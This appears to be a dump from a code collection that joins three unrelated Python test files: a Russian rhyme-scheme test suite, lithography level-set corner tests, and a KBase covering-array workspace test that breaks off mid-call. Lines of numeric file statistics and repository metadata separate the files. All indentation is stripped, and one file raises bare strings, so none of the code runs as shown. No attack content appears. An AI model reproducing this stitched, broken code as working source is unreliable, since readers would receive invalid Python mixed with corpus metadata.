for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aabbccaa')
def test_poem_7(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aabbccdd.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aabbccdd')
def test_poem_8(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aabcbc.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aabcbc')
def test_poem_9(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aax.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aaX')
def test_poem_10(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aaxa.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aaXa')
def test_poem_11(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aaxb.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aaXX')
def test_poem_12(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_ab.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'XX')
def test_poem_14(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_abab.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'abab')
def test_poem_15(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_ababcdcd.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'ababcdcd')
'''def test_poem_16(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_ababcdcdefef.txt'))
for stanza in stanzas:
rhyme_scheme_string, rhyme = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'ababcdcdefef')'''
def test_poem_17(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_abaxb.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'abaXb')
def test_poem_18(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_abba.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'abba')
def test_poem_19(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_abbaa.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'abbaa')
def test_poem_20(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_abbab.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'abbab')
'''def test_poem_21(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_abbabcbcddefef.txt'))
for stanza in stanzas:
rhyme_scheme_string, rhyme = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'abbabcbcddefef')'''
def test_poem_22(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_axa.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aXa')
def test_poem_23(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_xaa.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'Xaa')
def test_poem_24(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_xabab.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'Xabab')
def test_poem_25(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_xaxbab.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'XaXbab')
def test_poem_26(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_axaa.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aXaa')
def test_poem_27(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('problems.txt'))
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanzas[0][:4])
for line in stanzas[0]:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aaaa')
if __name__ == '__main__':
unittest.main()
| 42.242857 | 99 | 0.626564 | 1,446 | 11,828 | 4.851314 | 0.089903 | 0.128582 | 0.189024 | 0.088525 | 0.828083 | 0.814683 | 0.808125 | 0.808125 | 0.801853 | 0.801853 | 0 | 0.006552 | 0.264457 | 11,828 | 279 | 100 | 42.394265 | 0.79977 | 0 | 0 | 0.553097 | 0 | 0 | 0.07434 | 0.004641 | 0 | 0 | 0 | 0 | 0.119469 | 1 | 0.137168 | false | 0 | 0.013274 | 0 | 0.163717 | 0.225664 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b35ed8a98dcaad04bb8a91be98408900fc46e34a | 10,413 | py | Python | models/develset/src/utils/unit_tests/test_case1.py | phdyang007/pytorch-CycleGAN-and-pix2pix | 8057392a37d47a17ac0e8f7cc4642bec86bf2e43 | [
"BSD-3-Clause"
] | 1 | 2022-01-26T00:45:06.000Z | 2022-01-26T00:45:06.000Z | models/develset/src/utils/unit_tests/test_case1.py | phdyang007/pytorch-CycleGAN-and-pix2pix | 8057392a37d47a17ac0e8f7cc4642bec86bf2e43 | [
"BSD-3-Clause"
] | null | null | null | models/develset/src/utils/unit_tests/test_case1.py | phdyang007/pytorch-CycleGAN-and-pix2pix | 8057392a37d47a17ac0e8f7cc4642bec86bf2e43 | [
"BSD-3-Clause"
] | null | null | null | '''
Author: Guojin Chen @ CUHK-CSE
Homepage: https://dekura.github.io/
Date: 2020-12-26 17:07:15
LastEditTime: 2021-04-09 17:00:56
Contact: cgjhaha@qq.com
Description: the unit tests for the case4 target image
'''
from src.models.const import *
'''
8 9
0 1 2
3 x 4
5 6 7
10 11
'''
def test_ul_corner(x, y, type_corner, image, ls):
x1 = x + 512
y1 = y + 512
px = (0, 0, y1, x1)
px0 = (0, 0, y1 - 1, x1 - 1)
px1 = (0, 0, y1 - 1, x1)
px2 = (0, 0, y1 - 1, x1 + 1)
px3 = (0, 0, y1, x1 - 1)
px4 = (0, 0, y1, x1 + 1)
px5 = (0, 0, y1 + 1, x1 - 1)
px6 = (0, 0, y1 + 1, x1)
px7 = (0, 0, y1 + 1, x1 + 1)
px8 = (0, 0, y1 - 2, x1 - 2)
px9 = (0, 0, y1 - 2, x1 + 2)
px10 = (0, 0, y1 + 2, x1 - 2)
px11 = (0, 0, y1 + 2, x1 + 2)
assert image[px] == 1, 'the {} corner of ({},{}) should be {}'.format(type_corner, x, y, 1)
assert image[px0] == 0, 'the {} corner of ({},{}) position 0 should be {}'.format(type_corner, x, y, 0)
assert image[px7] == 1, 'the {} corner of ({},{}) position 0 should be {}'.format(type_corner, x, y, 1)
assert ls[px] == 0, 'the {} corner levelset of ({},{}) should be {}'.format(type_corner, x, y, 0)
assert ls[px7] == -1, 'the {} corner levelset of ({},{}) position7 should be {}'.format(type_corner, x, y, -1)
print('test {} corner of ({},{}) pass all'.format(type_corner, x, y))
'''
8 9
0 1 2
3 x 4
5 6 7
10 11
'''
def test_ll_corner(x, y, type_corner, image, ls):
x1 = x + 512
y1 = y + 512
px = (0, 0, y1, x1)
px0 = (0, 0, y1 - 1, x1 - 1)
px1 = (0, 0, y1 - 1, x1)
px2 = (0, 0, y1 - 1, x1 + 1)
px3 = (0, 0, y1, x1 - 1)
px4 = (0, 0, y1, x1 + 1)
px5 = (0, 0, y1 + 1, x1 - 1)
px6 = (0, 0, y1 + 1, x1)
px7 = (0, 0, y1 + 1, x1 + 1)
px8 = (0, 0, y1 - 2, x1 - 2)
px9 = (0, 0, y1 - 2, x1 + 2)
px10 = (0, 0, y1 + 2, x1 - 2)
px11 = (0, 0, y1 + 2, x1 + 2)
assert image[px] == 1, 'the {} corner of ({},{}) should be {}'.format(type_corner, x, y, 1)
assert image[px0] == 0, 'the {} corner of ({},{}) px0 should be {}'.format(type_corner, x, y, 0)
assert image[px7] == 1, 'the {} corner of ({},{}) px7 should be {}'.format(type_corner, x, y, 1)
assert ls[px] == 0, 'the {} corner levelset of ({},{}) should be {}'.format(type_corner, x, y, 0)
assert ls[px7] == -1, 'the {} corner levelset of ({},{}) position7 should be {}'.format(type_corner, x, y, -1)
print('the {} corner ls[px0] is {}, which should be sqrt(2)'.format(type_corner, ls[px0]))
print('the {} corner ls[px7] is {}, which should be -1'.format(type_corner, ls[px7]))
print('check the output to see whether pass all test {} corner of ({},{}) pass all'.format(type_corner, x, y))
print('\n========================\n')
'''
8 9
0 1 2
3 x 4
5 6 7
10 11
'''
def test_ur_corner(x, y, type_corner, image, ls):
x1 = x + 512
y1 = y + 512
px = (0, 0, y1, x1)
px0 = (0, 0, y1 - 1, x1 - 1)
px1 = (0, 0, y1 - 1, x1)
px2 = (0, 0, y1 - 1, x1 + 1)
px3 = (0, 0, y1, x1 - 1)
px4 = (0, 0, y1, x1 + 1)
px5 = (0, 0, y1 + 1, x1 - 1)
px6 = (0, 0, y1 + 1, x1)
px7 = (0, 0, y1 + 1, x1 + 1)
px8 = (0, 0, y1 - 2, x1 - 2)
px9 = (0, 0, y1 - 2, x1 + 2)
px10 = (0, 0, y1 + 2, x1 - 2)
px11 = (0, 0, y1 + 2, x1 + 2)
assert image[px] == 0, 'the {} corner of ({},{}) should be {}'.format(type_corner, x, y, 0)
assert image[px0] == 1, 'the {} corner of ({},{}) position 0 should be {}'.format(type_corner, x, y, 1)
assert image[px7] == 0, 'the {} corner of ({},{}) position 7 should be {}'.format(type_corner, x, y, 0)
assert ls[px0] == 0, 'the {} corner levelset of ({},{}) position 0 should be {}'.format(type_corner, x, y, 0)
print('the {} corner ls[px] is {}, which should be sqrt(2)'.format(type_corner, ls[px]))
print('the {} corner ls[px7] is {}, which should be sqrt(8)'.format(type_corner, ls[px7]))
print('check the output to see whether pass all test {} corner of ({},{}) pass all.'.format(type_corner, x, y))
print('\n========================\n')
'''
8 9
0 1 2
3 x 4
5 6 7
10 11
'''
def test_lr_convex(x, y, type_convex, image, ls):
x1 = x + 512
y1 = y + 512
px = (0, 0, y1, x1)
px0 = (0, 0, y1 - 1, x1 - 1)
px1 = (0, 0, y1 - 1, x1)
px2 = (0, 0, y1 - 1, x1 + 1)
px3 = (0, 0, y1, x1 - 1)
px4 = (0, 0, y1, x1 + 1)
px5 = (0, 0, y1 + 1, x1 - 1)
px6 = (0, 0, y1 + 1, x1)
px7 = (0, 0, y1 + 1, x1 + 1)
px8 = (0, 0, y1 - 2, x1 - 2)
px9 = (0, 0, y1 - 2, x1 + 2)
px10 = (0, 0, y1 + 2, x1 - 2)
px11 = (0, 0, y1 + 2, x1 + 2)
assert image[px] == 1, 'the {} convex of ({},{}) should be {}'.format(type_convex, x, y, 1)
assert image[px0] == 1, 'the {} convex of ({},{}) px0 should be {}'.format(type_convex, x, y, 1)
assert image[px7] == 1, 'the {} convex of ({},{}) px7 should be {}'.format(type_convex, x, y, 1)
assert image[px1] == 0, 'the {} convex of ({},{}) px1 should be {}'.format(type_convex, x, y, 0)
assert ls[px] == 0, 'the {} convex levelset of ({},{}) should be {}'.format(type_convex, x, y, 0)
assert ls[px1] == 1, 'the {} convex levelset of ({},{}) px1 should be {}'.format(type_convex, x, y, 1)
assert ls[px7] == -1, 'the {} convex levelset of ({},{}) px7 should be {}'.format(type_convex, x, y, -1)
assert ls[px9] == 2, 'the {} convex levelset of ({},{}) px7 should be {}'.format(type_convex, x, y, 2)
print('check the output to see whether pass all test {} convex of ({},{}) pass all'.format(type_convex, x, y))
print('\n========================\n')
'''
8 9
0 1 2
3 x 4
5 6 7
10 11
'''
def test_ul_convex(x, y, type_convex, image, ls):
x1 = x + 512
y1 = y + 512
px = (0, 0, y1, x1)
px0 = (0, 0, y1 - 1, x1 - 1)
px1 = (0, 0, y1 - 1, x1)
px2 = (0, 0, y1 - 1, x1 + 1)
px3 = (0, 0, y1, x1 - 1)
px4 = (0, 0, y1, x1 + 1)
px5 = (0, 0, y1 + 1, x1 - 1)
px6 = (0, 0, y1 + 1, x1)
px7 = (0, 0, y1 + 1, x1 + 1)
px8 = (0, 0, y1 - 2, x1 - 2)
px9 = (0, 0, y1 - 2, x1 + 2)
px10 = (0, 0, y1 + 2, x1 - 2)
px11 = (0, 0, y1 + 2, x1 + 2)
assert image[px] == 1, 'the {} convex of ({},{}) should be {}'.format(type_convex, x, y, 1)
assert image[px0] == 1, 'the {} convex of ({},{}) px0 should be {}'.format(type_convex, x, y, 1)
assert image[px1] == 1, 'the {} convex of ({},{}) px1 should be {}'.format(type_convex, x, y, 1)
assert image[px3] == 0, 'the {} convex of ({},{}) px3 should be {}'.format(type_convex, x, y, 0)
assert image[px5] == 0, 'the {} convex of ({},{}) px5 should be {}'.format(type_convex, x, y, 0)
assert image[px6] == 1, 'the {} convex of ({},{}) px6 should be {}'.format(type_convex, x, y, 1)
assert image[px7] == 1, 'the {} convex of ({},{}) px7 should be {}'.format(type_convex, x, y, 1)
assert ls[px] == 0, 'the {} convex levelset of ({},{}) should be {}'.format(type_convex, x, y, 0)
# assert ls[px1] == 1, 'the {} convex levelset of ({},{}) px1 should be {}'.format(type_convex, x, y, 1)
assert ls[px7] == -1, 'the {} convex levelset of ({},{}) px7 should be {}'.format(type_convex, x, y, -1)
assert ls[px3] == 1, 'the {} convex levelset of ({},{}) px3 should be {}'.format(type_convex, x, y, 1)
print('the {} convex ls[px1] is {}, which should be 0'.format(type_convex, ls[px1]))
print('the {} convex ls[px8] is {}, which should be -1'.format(type_convex, ls[px8]))
print('the {} convex ls[px9] is {}, which should be -sqrt(5)'.format(type_convex, ls[px9]))
print('check the output to see whether pass all test {} convex of ({},{}) pass all'.format(type_convex, x, y))
print('\n========================\n')
'''
x, y is the coord in glp
'''
def test_corner(x, y, type_corner, image, ls):
if type_corner == 'ur':
test_ur_corner(x, y, type_corner, image, ls)
elif type_corner == 'll':
test_ll_corner(x, y, type_corner, image, ls)
else:
raise 'not implmentation'
def test_convex(x, y, type_convex, image, ls):
if type_convex == 'lr':
test_lr_convex(x, y, type_convex, image, ls)
elif type_convex == 'ul':
test_ul_convex(x, y, type_convex, image, ls)
else:
raise 'not implmentation'
def test_outer(x, y, image, ls):
type_convex = 'outer'
x1 = x + 512
y1 = y + 512
px = (0, 0, y1, x1)
px0 = (0, 0, y1 - 1, x1 - 1)
px1 = (0, 0, y1 - 1, x1)
px2 = (0, 0, y1 - 1, x1 + 1)
px3 = (0, 0, y1, x1 - 1)
px4 = (0, 0, y1, x1 + 1)
px5 = (0, 0, y1 + 1, x1 - 1)
px6 = (0, 0, y1 + 1, x1)
px7 = (0, 0, y1 + 1, x1 + 1)
px8 = (0, 0, y1 - 2, x1 - 2)
px9 = (0, 0, y1 - 2, x1 + 2)
px10 = (0, 0, y1 + 2, x1 - 2)
px11 = (0, 0, y1 + 2, x1 + 2)
assert image[px] == 0, 'the {} convex of ({},{}) should be {}'.format(type_convex, x, y, 0)
assert image[px0] == 0, 'the {} convex of ({},{}) px0 should be {}'.format(type_convex, x, y, 0)
assert image[px1] == 0, 'the {} convex of ({},{}) px1 should be {}'.format(type_convex, x, y, 0)
assert image[px3] == 0, 'the {} convex of ({},{}) px3 should be {}'.format(type_convex, x, y, 0)
assert image[px5] == 0, 'the {} convex of ({},{}) px5 should be {}'.format(type_convex, x, y, 0)
assert image[px6] == 0, 'the {} convex of ({},{}) px6 should be {}'.format(type_convex, x, y, 0)
assert image[px7] == 0, 'the {} convex of ({},{}) px7 should be {}'.format(type_convex, x, y, 0)
assert ls[px] == UP_TRUNCATED_D, 'the {} convex levelset of ({},{}) should be {}'.format(type_convex, x, y, UP_TRUNCATED_D)
# assert ls[px1] == 1, 'the {} convex levelset of ({},{}) px1 should be {}'.format(type_convex, x, y, 1)
assert ls[px7] == UP_TRUNCATED_D, 'the {} convex levelset of ({},{}) px7 should be {}'.format(type_convex, x, y, UP_TRUNCATED_D)
assert ls[px3] == UP_TRUNCATED_D, 'the {} convex levelset of ({},{}) px3 should be {}'.format(type_convex, x, y, UP_TRUNCATED_D)
# print('the {} convex ls[px1] is {}, which should be 0'.format(type_convex, ls[px1]))
# print('the {} convex ls[px8] is {}, which should be -1'.format(type_convex, ls[px8]))
# print('the {} convex ls[px9] is {}, which should be -sqrt(5)'.format(type_convex, ls[px9]))
print('check the output to see whether pass all test {} convex of ({},{}) pass all'.format(type_convex, x, y))
print('\n========================\n')
| 42.851852 | 133 | 0.521464 | 1,801 | 10,413 | 2.95447 | 0.062743 | 0.029318 | 0.058636 | 0.148844 | 0.934599 | 0.925578 | 0.922195 | 0.905845 | 0.893629 | 0.856418 | 0 | 0.108496 | 0.257371 | 10,413 | 242 | 134 | 43.028926 | 0.579594 | 0.064823 | 0 | 0.72093 | 0 | 0 | 0.296324 | 0.01479 | 0 | 0 | 0 | 0 | 0.244186 | 1 | 0.046512 | false | 0.034884 | 0.005814 | 0 | 0.052326 | 0.104651 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6428146be1f47649727e610bf6ebecb3343763fb | 20,730 | py | Python | test/Coveringarray_server_test.py | DrewCross/Coveringarray | db8f833f7cbbf16d8800ab3e085e8eeff4c7ed7b | [
"MIT"
] | null | null | null | test/Coveringarray_server_test.py | DrewCross/Coveringarray | db8f833f7cbbf16d8800ab3e085e8eeff4c7ed7b | [
"MIT"
] | null | null | null | test/Coveringarray_server_test.py | DrewCross/Coveringarray | db8f833f7cbbf16d8800ab3e085e8eeff4c7ed7b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import subprocess
import time
import unittest
from configparser import ConfigParser
from Coveringarray.CoveringarrayImpl import Coveringarray
from Coveringarray.CoveringarrayServer import MethodContext
from Coveringarray.authclient import KBaseAuth as _KBaseAuth
from installed_clients.WorkspaceClient import Workspace
class CoveringarrayTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
token = os.environ.get('KB_AUTH_TOKEN', None)
config_file = os.environ.get('KB_DEPLOYMENT_CONFIG', None)
cls.cfg = {}
config = ConfigParser()
config.read(config_file)
for nameval in config.items('Coveringarray'):
cls.cfg[nameval[0]] = nameval[1]
# Getting username from Auth profile for token
authServiceUrl = cls.cfg['auth-service-url']
auth_client = _KBaseAuth(authServiceUrl)
user_id = auth_client.get_user(token)
# WARNING: don't call any logging methods on the context object,
# it'll result in a NoneType error
cls.ctx = MethodContext(None)
cls.ctx.update({'token': token,
'user_id': user_id,
'provenance': [
{'service': 'Coveringarray',
'method': 'please_never_use_it_in_production',
'method_params': []
}],
'authenticated': 1})
cls.wsURL = cls.cfg['workspace-url']
cls.wsClient = Workspace(cls.wsURL)
cls.serviceImpl = Coveringarray(cls.cfg)
cls.scratch = cls.cfg['scratch']
cls.callback_url = os.environ['SDK_CALLBACK_URL']
suffix = int(time.time() * 1000)
cls.wsName = "_test_Cover_" + str(suffix)
ret = cls.wsClient.create_workspace({'workspace': cls.wsName}) # noqa
@classmethod
def tearDownClass(cls):
if hasattr(cls, 'wsName'):
cls.wsClient.delete_workspace({'workspace': cls.wsName})
print('Test workspace was deleted')
def getWsClient(self):
return self.__class__.wsClient
def getWsName(self):
if hasattr(self.__class__, 'wsName'):
return self.__class__.wsName
suffix = int(time.time() * 1000)
wsName = "test_Cover_"+str(suffix)
ret = self.getWsClient().create_workspace({'workspace':wsName})
self.__class__.wsName = wsName
return wsName
def getImpl(self):
return self.__class__.serviceImpl
def getContext(self):
return self.__class__.ctx
# NOTE: According to Python unittest naming rules test method names should start from 'test'. # noqa
def testManualInput(self):
testMedia = {"__VERSION__":1,"id":"kb|media.664","isDefined":0,"isMinimal":0,"mediacompounds":[{"compound_ref":"kbase/default/compounds/id/cpd00205",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00242","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00048","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00009",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00007","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00013","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00971",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00067","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00001","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00036",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00100","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00023","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00027",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd10516","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00058","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00099",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00137","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00063","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00254",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00030","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00034","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00149",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00244","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd10515","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd11574",
"concentration":0.001,"maxFlux":100,"minFlux":-100}],"name":"7H9","source_id":"7H9","type":"unspecified"}
#weka has the object saved in the setupclass method
mediaObject = self.getWsClient().save_objects({'workspace': self.getWsName(),'objects': [{'name':'Mediain',
'type':'KBaseBiochem.Media',
'data':testMedia }]
})[0]
# Prepare test objects in workspace if needed using
#
# Run your method by
# ret = self.getImpl().your_method(self.getContext(), parameters...)
#
# Check returned data with
# self.assertEqual(ret[...], ...) or other unittest methods
ret = self.serviceImpl.run_Coveringarray(self.ctx, {'workspace_name': self.wsName,'option_0':"2",
'container_object': [{"option_1":"Firefox", "option_2":["on","off"]},
{"option_1":"Network", "option_2":["on","off"]},
{"option_1":"Feature", "option_2":["ready","unready","unsure"]},{"option_1":"os", "option_2":["low","medium","high","very high"]}
],
'input_media':'','evaluation_options':'',
'output_media':'matrixout',
'output_json_check':1,
'output_media_check':0})
arrayValid = int(subprocess.check_output(['/kb/module/./checkpairs','/kb/module/anneal.out']))
self.assertEqual(arrayValid,0,"Produced incorrect coverage array")
def testMediaInput(self):
testMedia = {"__VERSION__":1,"id":"kb|media.664","isDefined":0,"isMinimal":0,"mediacompounds":[{"compound_ref":"kbase/default/compounds/id/cpd00205",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00242","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00048","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00009",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00007","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00013","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00971",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00067","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00001","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00036",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00100","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00023","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00027",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd10516","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00058","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00099",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00137","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00063","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00254",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00030","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00034","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00149",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00244","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd10515","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd11574",
"concentration":0.001,"maxFlux":100,"minFlux":-100}],"name":"7H9","source_id":"7H9","type":"unspecified"}
#weka has the object saved in the setupclass method
mediaObject = self.getWsClient().save_objects({'workspace': self.getWsName(),'objects': [{'name':'Mediain',
'type':'KBaseBiochem.Media',
'data':testMedia }]
})[0]
ret = self.serviceImpl.run_Coveringarray(self.ctx, {'workspace_name': self.wsName, 'container_object':[{'option_1':'appendedmedia','option_2':['apoption1','apoption2']}],
'option_0':"2",'input_media':mediaObject[0],'evaluation_options':'append_media','output_media':'matrixout',
